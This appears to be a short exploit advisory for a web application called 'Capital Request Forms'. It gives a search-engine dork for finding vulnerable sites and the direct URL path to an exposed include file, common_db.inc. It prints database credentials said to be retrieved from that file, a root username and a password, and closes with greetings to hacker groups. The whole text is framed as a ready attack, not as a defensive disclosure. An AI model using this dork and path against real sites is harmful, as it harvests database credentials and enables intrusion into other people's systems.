#
# Title: Capital Request Forms Db Username and Password Vulnerabilities
# Author: Gokhan
# Contact: gokhankaya (AT) hotmail (DOT) com
# Dork: inurl:common_db.inc
#
# Script:
#
# ExpLoit : http://[site]/[path]/inc/common_db.inc ;)
#
#
# Code: common_db.inc
#
++
+ $dbhost = "localhost";// DBHST NAME+
+ $dbusername = "root";// DB USER NAME+
+ $dbuserpassword = "sql1234";// DB USER PASSWRD+
+ $default_dbname = "douglas";// DB NAME+
++
#
#
# <?php function Tesekkurler() {
# $thnx="GreetZ";
# print ("$thnx : BLaCKWHITE,CanberX,LGMAN,HackerBox.EU");
#} Tesekkurler();
#// FRM TURKEY ?>
#
#